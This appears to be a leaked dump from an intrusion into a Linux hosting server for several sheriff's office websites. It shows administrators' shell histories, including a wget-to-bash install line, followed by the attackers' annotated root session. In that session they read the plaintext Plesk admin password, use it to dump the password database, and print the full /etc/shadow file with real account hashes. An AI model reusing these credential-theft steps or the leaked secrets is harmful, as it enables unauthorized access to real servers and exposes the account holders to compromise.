- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- crontab -l
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php >>
- /backup/johms_parse_log.txt
- cd Export/Images/
- ll
- ll 1243376
- ll 1243376*
- ll 1*
- ll 124*
- ll 12433*
- cd ..
- ll
- cd ..
- ll
- less clean.php
- vi clean.php
- php clean.php
- vi clean.php
- php clean.php
- ll
- cd Export/Images/
- ll
- cd ..
- cd ..
- php clean.php
- ll
- php clean.php
- ll
- ll
- ll
- cd export_backup/
- ll
- less RosterExport_2011_07_
- ll
- ll
- cd ..
- ll
- vi parse_roster.php
- vi parse_roster.php
- ll
- cd export_backup/
- ll
- ll
- ll
- cd /backup/
- ll
- vi johms_parse_log.txt
- ll
- cd /var/www/vhosts/jocomosheriff.org/home/
- ll
- cd Export/
- ll
- ll
- ll
- ll
- ll
- ll
- ll
- ll
- cd Images/
- ll
- cd ..
- ll
- cp *.JPG Images/
- ll
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php >>
- /backup/johms_parse_log.txt
- cd ..
- cd export_backup/
- ll
- ll
- ll
- cd ..
- cd Export/
- ll
- cd Images/
- ll
- ll
- ll | less
- ll
- cd ..
- ll
- cd ..
- ll
- du -sh ./*
- vi clean.php
- php clean.php
- ll
- vi clean.php
- php clean.php
- ll
- du -sh ./*
- cd Export/
- ll
- cd ..
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php >>
- /backup/johms_parse_log.txt
- ll
- du -sh ./*
- ll
- cd export_backup/
- ll
- ll
- cd ..
- cd Export/Images/
- ll
- cd ../../
- ll
- php clean.php
- ll
- du -sh ./*
- ll
- ll
- du -sh ./*
- du -sh ./*
- du -sh ./*
- cd Export/
- ll
- cd Images/
- ll
- ll
- ll 1322055.JPG
- ll
- cd ../../
- ll
- php parse_roster.php
- ll
- cd Export/
- ll
- ll
- cd Images/
- ll
- cd ..
- ll
- ll
- du -sh
- du -sh ./*
- top
- ll
- cd ..
- du -sh ./*
- ll
- ll
- du -sh ./*
- du -sh ./*
- cd ~
- ll
- mkdir MASS_PASS
- ll
- cd MASS_PASS/
- ll
- vi masspass.php
- ll
- php masspass.php
- vi masspass.php
- php masspass.php
- vi masspass.php
- php masspass.php
- vi masspass.php
- vi masspass.php
- php masspass.php
- vi masspass.php
- php masspass.php
- vi masspass.php
- php masspass.php
- vi masspass.php
- php masspass.php -p 12345
- php masspass.php -p12345
- vi masspass.php
- php masspass.php -p12345
- php masspass.php
- vi masspass.php
- php masspass.php
- php masspass.php -oe0d14a92 -n12345
- vi masspass.php
- php masspass.php -oe0d14a92 -n12345
- php masspass.php -oe0d14a92 -nY9BNtSeb
- vi masspass.php
- php masspass.php -oe0d14a92 -nY9BNtSeb
- php masspass.php
- vi masspass.php
- php masspass.php
- php masspass.php -n705ad48f3563c4c30d3fec8564b7636b
- -oa872c8327d9b4b3e3e1cf6b673c529b4
- php masspass.php
- ll
- php masspass.php
- vi masspass.php
- crontab -e
- top
- ll
- less sete.sh
- less tat\ E
- cd /var/www/vhosts/crosscountysheriff.org/home/
- ll
- cd Cross\ County/
- ll
- vi test.txt
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/parse_pcv.php >/dev/null 2>&1
- cd /var/www/vhosts/boonesheriff.com/home/
- ll
- vi test.txt
- ll
- cronatb -l
- crontab -l
- /usr/bin/php /var/www/vhosts/boonesheriff.com/home/parse_pcv.php >/dev/null 2>&1
- ll
- cd images/
- ll
- ll
- cd ..
- ll
- ls
- ls scripts/
- at 6:00 AM tomorrow
- postfix -q
- postfix -p
- postqueue -q
- postqueue -p
- cd /usr/local/ll
- cd /usr/local/psa/var/
- ll
- cd log
- ll
- less maillog
- grep 'status=' maillog | less
- grep 'status=deferred' maillog | less
- grep 'timed out while receiving the initial server greeting' maillog | less
- grep 'conversation with s2smtpout' maillog | less
- grep 'radams' maillog | less
- crontab -l
- grep 'conversation with s2smtpout' maillog | mail -s "Relay Server Issues"
- serverwatch@bjmweb.com
- grep 'linda@voltplastics.com' maillog | less
- cd ~
- ll
- ll
- less huh
- ll
- ll -rt
- cd MASS_PASS/
- ll
- php masspass.php
- php masspass.php -oY9BNtSeb -nYNw1rTxp
- php masspass.php
- php masspass.php -n10df020e5e24b80589b4b618b107055c
- -o705ad48f3563c4c30d3fec8564b7636b
- php masspass.php
- cd MASS_PASS/
- ll
- php masspass.php
- ll
- cd MASS_PASS/
- php masspass.php
- su - mstapleton
- cd /var/www/vhosts/
- ll
- cd cherokeecountyalsheriff.com/
- ll
- cd httpdocs/
- ll
- cd _newsite/
- ll
- cd ../
- ll
- chown -R ccsal:psacln _newsite/
- ll
- cd _newsite/
- ll
- exit
- cd /var/www/vhosts/cherokeecountyalsheriff.com/
- ll
- cd httpdocs/
- ll
- cd _n
- cd _newsite/
- ll
- cd controllers/
- ll
- cd ../
- ll
- chown -R ccsal:psacln controllers/
- chown -R ccsal:psacln helpers/
- chown -R ccsal:psacln model/
- chown -R ccsal:psacln views/
- ll
- exit
- # cat ~webdebt/.bash_history
- su -l root -c "wget -q -O - http://208.109.96.14/public/scripts/nbu_install.sh |
- bash -s 800384d4-e9bb-11de-a2ed-00114332b4ff"
- exit
- su root
- su
- ls
- cd var/
- ls
- cd www/vhosts/
- ls
- cd baxtercountysheriff.com/
- ls
- cd httpdocs
- ls
- mkdir httpdocs
- su -
- su -
- ls
- cd /var/www/vhosts/
- ls
- cd baxtercountysheriff.com/
- ls
- mkdir vhosts
- cd ..
- ls
- mkdir poop
- rm poop
- rm -rf poop
- ls
- cd 20jdpa
- cd 20jdpa.com/
- ls
- mkdir httpdocs
- ls
- mkdir httpdocs
- su
- cd /var/www/vhosts/
- ll
- cd 20jdpa.com/httpdocs/
- su
- su -
- mkdir cert
- exit
- su -
- su -
- exti
- exit
- su -
- su -
- su -
- su -
- exi
- exit
- ll
- cd ..
- cd
- ll
- cd
- /
- cd //
- ll
- su -
- exit
- su
- cd.
- ;;
- ll
- su root
- ll
- cd
- ll
- cd
- ll
- su
- su -
- cd .ssh
- lll
- ll
- ll -a
- less authorized_keys
- cd ~
- pwd
- exit
- ////////////////////////////////////////////////////////////////////////////////
- ON TO SERVER NUMBER TWO...
- ROOTING YOUR BOX ALL OVER AGAIN ... THANKS FOR COPYING OUR ROOTSHELLS OVER!
- ////////////////////////////////////////////////////////////////////////////////
- # id
- uid=0(root) gid=0(root) groups=48(apache),504(psaserv),506(psasb)
- # uname -a
- Linux ip-173-201-44-217.ip.secureserver.net 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9
- 12:54:40 EST 2010 i686 i686 i386 GNU/Linux
- // GET THEIR NEW PLESK ROOT PASSWORD...
- # cat /etc/psa/.psa.shadow
- xP7bhLwbSkNiHyWS9PpnCG/u1wMkKy2/
- // GET THEIR NEW PASSWORDS... THANKS AGAIN PLESK FOR THE PLAINTEXTS
- # mysqldump -q -u admin -pxP7bhLwbSkNiHyWS9PpnCG/u1wMkKy2/ --databases psa
- --add-drop-table > newpasses.sql
- // JUST FOR FUN...
- # cat /etc/shadow
- root:$1$.1QVTig3$JduJkOj4jwaps0mslfpGK0:15184:0:99999:7:::
- bin:*:13913:0:99999:7:::
- daemon:*:13913:0:99999:7:::
- adm:*:13913:0:99999:7:::
- lp:*:13913:0:99999:7:::
- sync:*:13913:0:99999:7:::
- shutdown:*:13913:0:99999:7:::
- halt:*:13913:0:99999:7:::
- mail:*:13913:0:99999:7:::
- news:*:13913:0:99999:7:::
- uucp:*:13913:0:99999:7:::
- operator:*:13913:0:99999:7:::
- games:*:13913:0:99999:7:::
- gopher:*:13913:0:99999:7:::
- ftp:*:13913:0:99999:7:::
- nobody:*:13913:0:99999:7:::
- rpm:!!:13913:0:99999:7:::
- dbus:!!:13913:0:99999:7:::
- mailnull:!!:13913:0:99999:7:::
- smmsp:!!:13913:0:99999:7:::
- nscd:!!:13913:0:99999:7:::
- vcsa:!!:13913:0:99999:7:::
- rpc:!!:13913:0:99999:7:::
- rpcuser:!!:13913:0:99999:7:::
- nfsnobody:!!:13913:0:99999:7:::
- sshd:!!:13913:0:99999:7:::
- pcap:!!:13913:0:99999:7:::
- haldaemon:!!:13913:0:99999:7:::
- bjmsuper:$1$M63jQMA6$cv.SNTL28NcjmVAaxs2Ej.:15184:0:99999:7:::
- avahi:!!:15182::::::
- avahi-autoipd:!!:15182::::::
- named:!!:15182::::::
- xfs:!!:15182::::::
- apache:!!:15182::::::
- distcache:!!:15182::::::
- mysql:!!:15182::::::
- ntp:!!:15182::::::
- psaadm:!!:15182:0:99999:7:::
- popuser:!!:15182:0:99999:7:::
- mhandlers-user:!!:15182:0:99999:7:::
- psaftp:!!:15182:0:99999:7:::
- sw-cp-server:!!:15182:0:99999:7:::
- webalizer:!!:15182::::::
- postgres:!!:15182::::::
- mailman:!!:15182::::::
- drweb:!!:15182::::::
- postfix:!!:15182::::::
- bcsd:$1$xCMvzTCw$la6TitHPqhZJZxGm8htNm0:15184:0:99999:7:::
- bocs:$1$5MIGny/8$RomAufC87/GVd5jpQqvXd1:15185:0:99999:7:::
- bcso_tiger:$1$sezwL7Dg$FoEEp5RY.3X.nT.uyA1C8/:15184:0:99999:7:::
- ciga:$1$/FQWHz0M$yWPMQj14PQvi1fecxIrsO1:15185:0:99999:7:::
- kcsoms:$1$xAHy/f1k$7xCQaeD8ixjn3xhVwaZyX.:15184:0:99999:7:::
- mcsd:$1$sEyGh2be$PMm64ZLZ7F35Th.EdFZBO1:15184:0:99999:7:::
- bjm:$1$Cy5SbB3b$WHQqxFVZ.mo9CAuw3QK2U.:15184:0:99999:7:::
- demo:$1$yY//AeXg$wNK80Z9Un9tVXIBdSnFVr.:15184:0:99999:7:::
- dymin:$1$Y3Q/Kl9u$BLGlnjVjes3j0Ef6mZKai.:15184:0:99999:7:::
- code:$1$djs7zQTz$MLKsBoIpUu9kQsOJCkgMM/:15184:0:99999:7:::
- bjm2:$1$tW0LeatV$nR94bHILSdmz0Q4N1lpuu1:15184:0:99999:7:::
- polms:$1$dnP9bxxQ$DpXSyrQ6sAFBlchPa1nEd.:15184:0:99999:7:::
- dcsd:$1$ifDMxt/3$vu/BPAh/654jVaUy1FwGk.:15184:0:99999:7:::
- hcsoks:$1$8wW7ldva$S8VCJaXcIVvBY7vfEld2I/:15184:0:99999:7:::
- acsoms:$1$KhajK9K4$gZD3GQ4hFg3bZnm0vi6AN.:15184:0:99999:7:::
- bcsd_sync:$1$uFr8iazf$aByYOYgT811Ip.4wRexL2/:15184:0:99999:7:::
- stoms:$1$lBU2FPZk$HD9JCRmC/zs689ayKbnOO/:15185:0:99999:7:::
- sgsomo:$1$pf9ArBub$aBn.2ZMWAtTYF85YqEep7/:15185:0:99999:7:::
- lcsomo:$1$JR2qCyHf$u41XNGVKhFOdTU9y1e.wY/:15185:0:99999:7:::
- bcsoga:$1$rI93Txxe$2QOjFc33mgEVsYJo89pwf/:15185:0:99999:7:::
- scsomo:$1$r/8EJ7/Q$jbDryfYFa.AZ1pSWHYrqv.:15185:0:99999:7:::
- izcg:$1$um.djC2T$HpUPY4cMmw26EUq1GBFnQ.:15185:0:99999:7:::
- crcsd:$1$PgW3mxOA$WIfi2QX4j5z9HQ/yDadUZ1:15185:0:99999:7:::
- ncsd:$1$z7qrcv0Q$bLlPk0X3ICll7Jj.SYFko.:15185:0:99999:7:::
- johms:$1$YtAcr6vB$rMntSo3tbOZEiAbeFv8FU/:15185:0:99999:7:::
- mcmtn:$1$8Wo2rZXP$y7Ku9Vgu41Ee0mF6zJgv//:15185:0:99999:7:::
- vbcsd:$1$1GxJKxHV$Qc6XRkLc7SZrf3RrSJ/gd1:15185:0:99999:7:::
- rcpica:$1$OWMi9c1P$JvVzpKMhV..4iOLQh.iGz0:15185:0:99999:7:::
- icsd:$1$vYV3gRcq$qorp1ljJnyp/zzx9nnL8d.:15185:0:99999:7:::
- gcsd:$1$KxQLd2nC$emDotofAdSi8FVxHUa6070:15185:0:99999:7:::
- lawmo:$1$XS9q5HHW$WEMi7d5BhZfJ5hFF4tEZy/:15185:0:99999:7:::
- // ROOT LOGGED IN... THEY ARE ON TO US... BUT CAN NEVER STOP US
- # w; ps -aux
- 16:00:00 up 3 days, 14:28, 2 users, load average: 0.04, 0.05, 0.08
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- bjmsuper pts/0 mthm-static-67-2 09:42 6:10m 0.02s 0.25s sshd: bjmsuper
- root pts/1 mthm-static-67-2 Fri11 10:59 0.54s 0.54s -bash
- USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
- root 1 0.0 0.0 2160 584 ? Ss Jul27 0:01 init [3]
- root 2 0.0 0.0 0 0 ? S< Jul27 0:00 [migration/0]
- root 3 0.0 0.0 0 0 ? SN Jul27 0:00 [ksoftirqd/0]
- root 4 0.0 0.0 0 0 ? S< Jul27 0:00 [watchdog/0]
- root 5 0.0 0.0 0 0 ? S< Jul27 0:00 [migration/1]
- root 6 0.0 0.0 0 0 ? SN Jul27 0:00 [ksoftirqd/1]
- root 7 0.0 0.0 0 0 ? S< Jul27 0:00 [watchdog/1]
- root 8 0.0 0.0 0 0 ? S< Jul27 0:00 [migration/2]
- root 9 0.0 0.0 0 0 ? SN Jul27 0:00 [ksoftirqd/2]
- root 10 0.0 0.0 0 0 ? S< Jul27 0:00 [watchdog/2]
- root 11 0.0 0.0 0 0 ? S< Jul27 0:00 [migration/3]
- root 12 0.0 0.0 0 0 ? SN Jul27 0:00 [ksoftirqd/3]
- root 13 0.0 0.0 0 0 ? S< Jul27 0:00 [watchdog/3]
- root 14 0.0 0.0 0 0 ? S< Jul27 0:00 [events/0]
- root 15 0.0 0.0 0 0 ? S< Jul27 0:00 [events/1]
- root 16 0.0 0.0 0 0 ? S< Jul27 0:00 [events/2]
- root 17 0.0 0.0 0 0 ? S< Jul27 0:00 [events/3]
- root 18 0.0 0.0 0 0 ? S< Jul27 0:00 [khelper]
- root 19 0.0 0.0 0 0 ? S< Jul27 0:00 [kthread]
- root 25 0.0 0.0 0 0 ? S< Jul27 0:00 [kblockd/0]
- root 26 0.0 0.0 0 0 ? S< Jul27 0:00 [kblockd/1]
- root 27 0.0 0.0 0 0 ? S< Jul27 0:00 [kblockd/2]
- root 28 0.0 0.0 0 0 ? S< Jul27 0:00 [kblockd/3]
- root 29 0.0 0.0 0 0 ? S< Jul27 0:00 [kacpid]
- root 130 0.0 0.0 0 0 ? S< Jul27 0:00 [cqueue/0]
- root 131 0.0 0.0 0 0 ? S< Jul27 0:00 [cqueue/1]
- root 132 0.0 0.0 0 0 ? S< Jul27 0:00 [cqueue/2]
- root 133 0.0 0.0 0 0 ? S< Jul27 0:00 [cqueue/3]
- root 136 0.0 0.0 0 0 ? S< Jul27 0:00 [khubd]
- root 138 0.0 0.0 0 0 ? S< Jul27 0:00 [kseriod]
- root 213 0.0 0.0 0 0 ? S Jul27 0:00 [khungtaskd]
- root 216 0.0 0.0 0 0 ? S< Jul27 0:04 [kswapd0]
- root 217 0.0 0.0 0 0 ? S< Jul27 0:00 [aio/0]
- root 218 0.0 0.0 0 0 ? S< Jul27 0:00 [aio/1]
- root 219 0.0 0.0 0 0 ? S< Jul27 0:00 [aio/2]
- root 220 0.0 0.0 0 0 ? S< Jul27 0:00 [aio/3]
- root 375 0.0 0.0 0 0 ? S< Jul27 0:00 [kpsmoused]
- root 422 0.0 0.0 0 0 ? S< Jul27 0:00 [scsi_eh_0]
- root 428 0.0 0.0 0 0 ? S< Jul27 0:00 [ata/0]
- root 429 0.0 0.0 0 0 ? S< Jul27 0:00 [ata/1]
- root 430 0.0 0.0 0 0 ? S< Jul27 0:00 [ata/2]
- root 431 0.0 0.0 0 0 ? S< Jul27 0:00 [ata/3]
- root 432 0.0 0.0 0 0 ? S< Jul27 0:00 [ata_aux]
- root 438 0.0 0.0 0 0 ? S< Jul27 0:00 [scsi_eh_1]
- root 439 0.0 0.0 0 0 ? S< Jul27 0:00 [scsi_eh_2]
- root 460 0.0 0.0 0 0 ? S< Jul27 0:00 [kstriped]
- root 481 0.0 0.0 0 0 ? S< Jul27 0:22 [kjournald]
- root 506 0.0 0.0 0 0 ? S< Jul27 0:00 [kauditd]
- root 539 0.0 0.0 2376 628 ? S< Jul27 0:00 [kmpathd/0]
- root 1391 0.0 0.0 0 0 ? S< Jul27 0:00 [kmpathd/1]
- root 1392 0.0 0.0 0 0 ? S< Jul27 0:00 [kmpathd/2]
- root 1393 0.0 0.0 0 0 ? S< Jul27 0:00 [kmpathd/3]
- root 1394 0.0 0.0 0 0 ? S< Jul27 0:00
- [kmpath_handlerd]
- root 1423 0.0 0.0 0 0 ? S< Jul27 0:00 [kjournald]
- root 1687 0.0 0.0 0 0 ? S< Jul27 0:00 [kondemand/0]
- root 1688 0.0 0.0 0 0 ? S< Jul27 0:00 [kondemand/1]
- root 1689 0.0 0.0 0 0 ? S< Jul27 0:00 [kondemand/2]
- root 1690 0.0 0.0 0 0 ? S< Jul27 0:00 [kondemand/3]
- root 2146 0.0 0.0 12628 776 ? S< Jul27 0:00 [rpciod/0]
- root 2259 0.0 0.0 0 0 ? S< Jul27 0:00 [rpciod/1]
- root 2260 0.0 0.0 0 0 ? S< Jul27 0:00 [rpciod/2]
- root 2261 0.0 0.0 0 0 ? S< Jul27 0:00 [rpciod/3]
- rpcuser 2270 0.0 0.0 1964 744 ? Ss Jul27 0:00 rpc.statd
- root 2302 0.0 0.0 5952 636 ? Ss Jul27 0:00 rpc.idmapd
- dbus 2330 0.0 0.0 2844 940 ? Ss Jul27 0:00 dbus-daemon
- --system
- root 2343 0.0 0.0 2256 768 ? Ss Jul27 0:00 /usr/sbin/hcid
- root 2349 0.0 0.0 1832 504 ? Ss Jul27 0:00 /usr/sbin/sdpd
- root 2380 0.0 0.0 0 0 ? S< Jul27 0:00 [krfcommd]
- root 2424 0.0 0.0 12956 1396 ? Ssl Jul27 0:00 pcscd
- root 2438 0.0 0.0 1760 524 ? Ss Jul27 0:00 /usr/sbin/acpid
- root 2462 0.0 0.0 2008 452 ? Ss Jul27 0:00 /usr/bin/hidd
- --server
- root 2492 0.0 0.0 27364 1368 ? Ssl Jul27 0:00 automount
- root 2565 0.0 0.0 10260 2316 ? Ss Jul27 0:00 cupsd
- root 2582 0.0 0.0 2836 872 ? Ss Jul27 0:00 xinetd
- -stayalive -pidfile /var/run/xinetd.pid
- root 2687 0.0 0.0 6972 1804 ? Ss Jul27 0:05
- /usr/libexec/postfix/master
- root 2721 0.0 0.0 2000 364 ? Ss Jul27 0:00 gpm -m
- /dev/input/mice -t exps2
- postgres 2969 0.0 0.1 21248 3320 ? S Jul27 0:00
- /usr/bin/postmaster -p 5432 -D /var/lib/pgsql/data
- postgres 2971 0.0 0.0 11024 864 ? S Jul27 0:00 postgres:
- logger process
- postgres 2973 0.0 0.0 21248 948 ? S Jul27 0:00 postgres:
- writer process
- postgres 2974 0.0 0.0 12028 768 ? S Jul27 0:00 postgres: stats
- buffer process
- postgres 2975 0.0 0.0 11212 948 ? S Jul27 0:00 postgres: stats
- collector process
- drweb 3167 0.2 3.8 122892 119308 ? Ss Jul27 13:13 drwebd.real
- root 3186 0.0 0.3 41216 10008 ? S Jul27 0:24
- /usr/bin/sw-engine -c /usr/local/psa/admin/conf/php.ini
- /usr/lib/plesk-9.0/psa-health-monitor-notification.php
- root 3200 0.6 0.0 71956 2632 ? Ssl Jul27 31:31
- /usr/sbin/sw-collectd -C /etc/sw-collectd/collectd.conf
- root 3219 0.0 0.0 5380 1132 ? Ss Jul27 0:00 crond
- xfs 3244 0.0 0.0 3264 992 ? Ss Jul27 0:00 xfs -droppriv
- -daemon
- root 3269 0.0 0.0 2360 436 ? Ss Jul27 0:00 /usr/sbin/atd
- avahi 3296 0.0 0.0 2696 1300 ? Ss Jul27 0:00 avahi-daemon:
- running [ip-173-201-44-217.local]
- avahi 3297 0.0 0.0 2696 432 ? Ss Jul27 0:00 avahi-daemon:
- chroot helper
- 68 3310 0.0 0.1 5788 3780 ? Ss Jul27 0:00 hald
- root 3311 0.0 0.0 3264 988 ? S Jul27 0:00 hald-runner
- 68 3319 0.0 0.0 2108 816 ? S Jul27 0:00
- hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
- root 3348 0.0 0.0 33228 532 ? Sl Jul27 0:00 /usr/bin/hptsvr
- root 3650 0.0 0.3 26128 10404 ? SN Jul27 0:00 /usr/bin/python
- -tt /usr/sbin/yum-updatesd
- root 3653 0.0 0.0 2656 1136 ? SN Jul27 0:00
- /usr/libexec/gam_server
- root 3707 0.0 0.0 3612 428 ? S Jul27 0:00
- /usr/sbin/smartd -q never
- root 3711 0.0 0.0 1748 440 tty2 Ss+ Jul27 0:00 /sbin/mingetty
- tty2
- root 3712 0.0 0.0 1748 444 tty3 Ss+ Jul27 0:00 /sbin/mingetty
- tty3
- root 3713 0.0 0.0 1748 464 tty4 Ss+ Jul27 0:00 /sbin/mingetty
- tty4
- root 3716 0.0 0.0 1748 444 tty5 Ss+ Jul27 0:00 /sbin/mingetty
- tty5
- root 3718 0.0 0.0 1748 444 tty6 Ss+ Jul27 0:00 /sbin/mingetty
- tty6
- root 5002 0.0 0.0 1748 440 tty1 Ss+ Jul27 0:00 /sbin/mingetty
- tty1
- root 9735 0.0 0.0 2940 552 ? S Jul29 0:00
- /usr/lib/courier-imap/couriertcpd -address=0
- -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd -maxprocs=40
- -maxperip=4 -pid=/var/run/imapd.pid -nodnslookup -noidentlookup 143
- /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
- root 9737 0.0 0.0 1616 244 ? S Jul29 0:00
- /usr/sbin/courierlogger imapd
- root 9745 0.0 0.0 2940 568 ? S Jul29 0:00
- /usr/lib/courier-imap/couriertcpd -address=0
- -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd-ssl -maxprocs=40
- -maxperip=4 -pid=/var/run/imapd-ssl.pid -nodnslookup -noidentlookup 993
- /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
- /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
- root 9747 0.0 0.0 1616 244 ? S Jul29 0:00
- /usr/sbin/courierlogger imapd-ssl
- root 9753 0.0 0.0 2940 568 ? S Jul29 0:00
- /usr/lib/courier-imap/couriertcpd -address=0
- -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d -maxprocs=40
- -maxperip=4 -pid=/var/run/pop3d.pid -nodnslookup -noidentlookup 110
- /usr/sbin/pop3login /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir
- root 9755 0.0 0.0 1616 244 ? S Jul29 0:00
- /usr/sbin/courierlogger pop3d
- root 9762 0.0 0.0 2940 552 ? S Jul29 0:00
- /usr/lib/courier-imap/couriertcpd -address=0
- -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d-ssl -maxprocs=40
- -maxperip=4 -pid=/var/run/pop3d-ssl.pid -nodnslookup -noidentlookup 995
- /usr/bin/couriertls -server -tcpd /usr/sbin/pop3login
- /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir
- root 9764 0.0 0.0 1616 244 ? S Jul29 0:00
- /usr/sbin/courierlogger pop3d-ssl
- root 10009 0.0 0.0 0 0 ? S 12:50 0:00 [pdflush]
- root 11853 0.0 0.9 34508 29812 ? Ss Jul29 0:00 /usr/bin/spamd
- --username=popuser --daemonize --nouser-config --helper-home-dir=/var/qmail
- --max-children 5 --create-prefs
- --virtual-config-dir=/var/qmail/mailnames/%d/%l/.spamassassin
- --pidfile=/var/run/spamd/spamd_full.pid --socketpath=/tmp/spamd_full.sock
- popuser 11854 0.0 0.9 34508 28388 ? S Jul29 0:00 spamd child
- popuser 11855 0.0 0.9 34508 28312 ? S Jul29 0:00 spamd child
- 503 17229 0.0 0.2 10356 6568 ? S Jul27 0:43
- /usr/sbin/sw-cp-serverd -f /etc/sw-cp-server/config
- root 18794 0.0 0.0 4628 1216 ? S Jul27 0:00 /bin/sh
- /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock
- --log-error=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid
- --user=mysql
- mysql 18844 0.3 1.0 150116 32948 ? Sl Jul27 17:10
- /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
- --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking
- --socket=/var/lib/mysql/mysql.sock
- postfix 20135 0.0 0.0 7036 1780 ? S 14:37 0:00 pickup -l -t
- fifo -u -o content_filter smtp:127.0.0.1:10027
- postfix 20730 0.0 0.0 7728 2544 ? S Jul28 0:05 qmgr -l -t fifo
- -u
- postfix 20733 0.0 0.0 7072 1940 ? S Jul28 0:00 tlsmgr -l -t
- unix -u
- root 23510 0.0 0.1 12000 3420 ? Ss 09:42 0:00 sshd: bjmsuper
- [priv]
- bjmsuper 23516 0.0 0.0 12000 1852 ? S 09:42 0:00 sshd:
- bjmsuper@pts/0
- bjmsuper 23517 0.0 0.0 4632 1476 pts/0 Ss 09:42 0:00 -bash
- root 23545 0.0 0.0 9404 2092 pts/0 S 09:42 0:00 su -
- root 23546 0.0 0.0 4752 1444 pts/0 S+ 09:42 0:00 -bash
- root 24221 0.0 0.0 7220 1056 ? Ss Jul28 0:00 /usr/sbin/sshd
- drweb 25217 0.0 3.8 122892 117976 ? S 15:30 0:00 drwebd.real
- drweb 25218 0.0 3.8 122892 117980 ? S 15:30 0:00 drwebd.real
- drweb 25219 0.0 3.8 122892 117980 ? S 15:30 0:00 drwebd.real
- drweb 25220 0.0 3.8 122892 117980 ? S 15:30 0:00 drwebd.real
- named 26286 0.0 0.2 75300 6296 ? Ssl Jul27 0:03 /usr/sbin/named
- -u named -c /etc/named.conf -u named -t /var/named/run-root
- root 28663 0.0 0.0 0 0 ? S 15:48 0:00 [pdflush]
- root 29137 0.0 0.6 44620 20492 ? Ss 15:48 0:00 /usr/sbin/httpd
- apache 29139 0.0 0.2 30444 8224 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29140 0.0 0.8 54880 26848 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29141 0.0 0.5 45352 16812 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29142 0.0 0.5 45188 16312 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29143 0.0 0.8 54820 26052 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29145 0.0 0.5 45368 16896 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29146 0.0 0.5 45516 16564 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29148 0.0 0.5 45536 16508 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29194 0.0 0.8 54796 26952 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29195 0.0 0.5 45404 16312 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29197 0.0 0.8 54844 25836 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29198 0.0 0.5 45224 15928 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29199 0.0 0.5 45232 15828 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29200 0.0 0.8 54872 26868 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29201 0.0 0.5 45268 17176 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29202 0.0 0.5 45196 15784 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29203 0.0 0.8 54908 27108 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29205 0.0 0.5 45376 16368 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29206 0.0 0.8 54844 26268 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29207 0.0 0.5 45444 16520 ? S 15:48 0:00 /usr/sbin/httpd
- apache 29465 0.1 0.5 45152 15460 ? S 15:57 0:00 /usr/sbin/httpd
